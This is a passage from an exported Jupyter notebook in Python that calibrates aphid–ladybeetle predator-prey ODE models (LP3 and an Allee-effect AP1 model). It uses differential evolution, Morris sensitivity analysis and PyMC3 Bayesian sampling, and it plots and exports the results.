y_model = solve_ivp(
LP3_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[ ]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_LP3:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP3_model",
LP3_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP3_model",
LP3_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
# Prior distributions for the model's parameters
# r1_ = pm.Uniform(
# "r1",
# lower=(1.0 - percent_calibration) * r1,
# upper=(1.0 + percent_calibration) * r1,
# )
r1_ = pm.Data("r1", r1)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=1e6#(1.0 + percent_calibration) * a1,
)
# a2_ = pm.Uniform(
# "a2",
# lower=(1.0 - percent_calibration) * a2,
# upper=(1.0 + percent_calibration) * a2,
# )
a2_ = pm.Data("a2", a2)
a3_ = pm.Uniform(
"a3",
lower=(1.0 - percent_calibration) * a3,
upper=1e6#(1.0 + percent_calibration) * a3,
)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_2)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"LP3_model",
LP3_ode_wrapper(
time_calibration,
r1_,
r2_,
a1_,
a2_,
a3_,
u0_,
v0_,
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
)
with fine_model_LP3:
step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
# step = pm.DEMetropolisZ()
trace_calibration_LP3 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[ ]:
plt.hist(trace_calibration_LP3['a1'], bins=35)
plt.show()
# In[ ]:
calibration_variable_names = [
"std_deviation",
"a1",
"a3",
]
# In[ ]:
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
pm.plot_posterior(
trace_calibration_LP3[::plot_step],
var_names=(f"{variable}"),
kind="hist",
round_to=4,
point_estimate="mode"
)
plt.savefig(f"img/{variable}_posterior_cal_LP3.png")
# In[ ]:
az.plot_pair(
trace_calibration_LP3,
var_names=calibration_variable_names,
kind="hexbin",
fill_last=False,
marginals=True,
figsize=(10, 8),
)
plt.savefig("img/marginals_cal_LP3.png")
# In[ ]:
df_stats_summary = az.summary(
data=trace_calibration_LP3,
var_names=calibration_variable_names,
kind='stats',
round_to=15, # arredondamento de ponto flutuante no sumário
)
df_stats_summary
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[ ]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
rv_mpv_values_dict = dict()
progress_bar = tqdm(variable_names)
for variable in progress_bar:
progress_bar.set_description(f"Calculating MPV from KDE for {variable}")
rv_realization_values = pm_trace[f"{variable}"]
try:
num_of_dimensions = rv_realization_values.shape[1]
except IndexError:
num_of_dimensions = 0
if num_of_dimensions == 0:
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values)
rv_mpv_values_dict[f"{variable}"] = rv_mpv_value
else:
for dimension in range(num_of_dimensions):
variable_name_decomposed = f"{variable}[{dimension}]"
rv_realization_values_decomposed = np.array(rv_realization_values[:, dimension])
rv_mpv_value = _scalar_rv_mvp_estimation(rv_realization_values_decomposed)
rv_mpv_values_dict[f"{variable_name_decomposed}"] = rv_mpv_value
return rv_mpv_values_dict
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
new_arviz_summary = arviz_summary.copy()
variable_names = list(rv_modes_dict.keys())
rv_mode_values = list(rv_modes_dict.values())
new_arviz_summary["mpv"] = pd.Series(data=rv_mode_values, index=variable_names)
return new_arviz_summary
# In[ ]:
calibration_variable_mpv = calculate_rv_posterior_mpv(
pm_trace=trace_calibration_LP3, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_LP3.csv") # salvando em um csv para consultas
df_stats_summary
# In[ ]:
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_LP3["LP3_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_LP3["LP3_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_LP3["LP3_model"], 50, axis=0)
# In[ ]:
plt.figure(figsize=(15, 5))
plt.plot(
time_observations,
y_fit[:, 0],
"r",
label="Aphids (simulated)",
marker="X",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
time_observations,
y_fit[:, 1],
"b",
label="Ladybeetles (simulated)",
marker="o",
linestyle="-",
markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
time_observations,
aphid_observed.Density.values,
label="Aphids data",
marker="s",
linestyle="",
markersize=10
)
plt.plot(
time_observations,
ladybeetle_observed.Density.values,
label="Ladybeetles data",
marker="v",
linestyle="",
markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_LP3.png", dpi=300)
plt.show()
# In[ ]:
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict() # vamos gravar as realizações em um dicionário Python tbm
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
progress_bar.set_description(f"Gathering {variable} realizations")
parameter_realization = trace_calibration_LP3.get_values(f"{variable}")
dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_LP3.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[ ]:
df_realizations
# # Allee Prey Growth FR1 model
# ## The parameters r1 and r3 are very close to zero
# In[ ]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def AP1_model(
t,
X,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
):
u, v = X
u_prime = ( r1 * u - r2 * u * u ) * ( r2 * u * u - r3 * u ) - a1 * u * v
v_prime = 0
return u_prime, v_prime
def AP1_ode_solver(
y0,
t_span,
t_eval,
r1 = 1,
r2 = 1,
r3 = 1,
a1 = 1,
):
solution_ODE = solve_ivp(
fun=AP1_model,
t_span=t_span,
y0=y0,
t_eval=t_eval,
args=(r1,r2,r3,a1),
method="LSODA",
)
return solution_ODE
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[ ]:
def AP1_least_squares_error_ode(
par, time_exp, f_exp, fitting_model, initial_conditions
):
args = par
f_exp1, f_exp2 = f_exp
time_span = (time_exp.min(), time_exp.max())
weighting_for_exp1_constraints = 1
weighting_for_exp2_constraints = 1
num_of_qoi = len(f_exp)
try:
y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
# y_model = fitting_model(time_span, time_exp, *args)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
residual1 = f_exp1 - simulated_qoi1
residual2 = f_exp2 - simulated_qoi2
first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
objective_function = 1 / num_of_qoi * (first_term + second_term)
except ValueError:
objective_function = 1e15
return objective_function
def callback_de(xk, convergence):
"""
This function is to show the optimization procedure progress.
"""
print(f'parameters = {xk}\n')
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[ ]:
from scipy import optimize
seed = 1234
r1=0.00025591841125063587
r2=8.187887886937167e-11
r3=0.03133563264585748
a1=0.003699720734502655
denom_min = 0.1
denom_max = 1.9
bounds_AP1 = [
( ( r1 * denom_min ), ( r1 * denom_max ) ), # r1
( ( r2 * denom_min ), ( r2 * denom_max ) ), # r2
( ( r3 * denom_min ), ( r3 * denom_max ) ), # r3
( ( a1 * denom_min ), ( a1 * denom_max ) ), # a1
]
result_AP1 = optimize.differential_evolution(
AP1_least_squares_error_ode,
bounds=bounds_AP1,
args=(
aphid_data.Time.values,
[aphid_data.Density.values, ladybeetle_data.Density.values],
AP1_ode_solver,
y0,
),
popsize=30,
strategy="best1bin",
tol=1e-5,
recombination=0.95,
mutation=0.6,
maxiter=20000, # 2000
polish=True,
disp=True,
seed = seed, # for the sake of reproducibility
callback=callback_de,
workers=-1,
)
print(result_AP1)
# * Retrieving the calibrated parameter values:
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
r1_deterministic,
r2_deterministic,
r3_deterministic,
a1_deterministic,
) = result_AP1.x
solution_ODE_AP1 = AP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*result_AP1.x
)
t_computed_AP1, y_computed_AP1 = solution_ODE_AP1.t, solution_ODE_AP1.y
u_AP1, v_AP1 = y_computed_AP1
parameters_dict = {
"Model": "AP1",
u"$r1$": r1_deterministic,
u"$r2$": r2_deterministic,
u"$r3$": r3_deterministic,
u"$a1$": a1_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "r2=" + str(r2_deterministic) + "\n" + "r3=" + str(r3_deterministic) + "\n" + "a1=" + str(a1_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[ ]:
import matplotlib.pyplot as plt
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_AP1, u_AP1, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_AP1, v_AP1, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
residual_least_squares_result = AP1_least_squares_error_ode(
parameters_realization,
aphid_data.Time.values,
[u_data, v_data],
AP1_ode_solver,
y0
)
qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si
# In[ ]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_AP1.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[ ]:
from SALib.sample.morris import sample as ee_sample
mean_values_params = [
r1,
r2,
r3,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
from tqdm import tqdm
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP1 = AP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP1.y
qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[ ]:
from SALib.analyze.morris import analyze as ee_analyze
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_AP1.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_AP1.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[ ]:
def calculate_pest_time_derivative_series(
time_array,
u_array,
v_array,
ode_model,
model_pars
):
pest_time_derivative_values = list()
for t_idx, time in enumerate(time_array):
u = u_array[t_idx]
v = v_array[t_idx]
stacked_population = [u, v]
pest_time_derivative_value, _ = ode_model(time, stacked_population, *model_pars)
pest_time_derivative_values.append(pest_time_derivative_value)
pest_time_derivative_array = np.array(pest_time_derivative_values)
return pest_time_derivative_array
# In[ ]:
pest_time_derivative_array = calculate_pest_time_derivative_series(
t_computed_AP1,
u_AP1,
v_AP1,
AP1_model,
mean_values_params
)
pest_time_derivative_array
# In[ ]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_AP1, u_AP1, '-x', label='Pest population')
plt.plot(t_computed_AP1, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_AP1.png", dpi=300)
plt.show()
# In[ ]:
mean_values_params = [
r1,
r2,
r3,
a1,
]
factors_names = [
r"$r1$",
r"$r2$",
r"$r3$",
r"$a1$",
]
params_perturbations = 0.5
problem_info = {
'num_vars': len(mean_values_params),
'names': factors_names,
'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[ ]:
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_AP1 = AP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_AP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
AP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[ ]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[ ]:
df_sigmai
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_AP1.png", dpi=300)
plt.show()
# In[ ]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_AP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[ ]:
@theano.compile.ops.as_op(
itypes=[
t.dvector,
t.dscalar, # r1
t.dscalar, # r2
t.dscalar, # r3
t.dscalar, # a1
t.dscalar, # u0
t.dscalar, # v0
],
otypes=[t.dmatrix]
)
def AP1_ode_wrapper(time_exp, r1, r2, r3, a1, u0, v0):
time_span = (time_exp.min(), time_exp.max())
args = [r1, r2, r3, a1]
initial_conditions = np.array([u0, v0])
y_model = solve_ivp(
AP1_model,
time_span,
initial_conditions,
t_eval=time_exp,
method='LSODA',
args=args
)
simulated_time = y_model.t
simulated_ode_solution = y_model.y
simulated_qoi1, simulated_qoi2 = simulated_ode_solution
concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
return concatenate_simulated_qoi
# In[ ]:
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000
start_time = time.time()
percent_calibration = 0.95
with pm.Model() as fine_model_AP1:
# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 20 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + 20 * percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP1_model",
AP1_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
)
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
[observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
with pm.Model() as coarse_model_1:
# Prior distributions for the model's parameters
r1_ = pm.Uniform(
"r1",
lower=(1.0 - percent_calibration) * r1,
upper=(1.0 + 20 * percent_calibration) * r1,
)
# r2_ = pm.Uniform(
# "r2",
# lower=(1.0 - percent_calibration) * r2,
# upper=(1.0 + percent_calibration) * r2,
# )
r2_ = pm.Data("r2", r2)
r3_ = pm.Uniform(
"r3",
lower=(1.0 - percent_calibration) * r3,
upper=(1.0 + 20 * percent_calibration) * r3,
)
a1_ = pm.Uniform(
"a1",
lower=(1.0 - percent_calibration) * a1,
upper=(1.0 + percent_calibration) * a1,
)
# a1_ = pm.Data("a1", a1)
# Prioris for Initial Conditions
u0, v0 = y0
u0_ = pm.Data("u0", u0)
v0_ = pm.Data("v0", v0)
standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2) # note 'shape' here
# Wrapper for time. We need it this way in order to change it for predictions
time_calibration = pm.Data("time", time_observations_coarse_1)
# Defining the deterministic formulation of the problem
fitting_model = pm.Deterministic(
"AP1_model",
AP1_ode_wrapper(
time_calibration,
r1_,
r2_,
r3_,
a1_,
u0_,
v0_
),
)
likelihood_model = pm.Normal(
"likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
)
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
[observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
with pm.Model() as coarse_model_2:
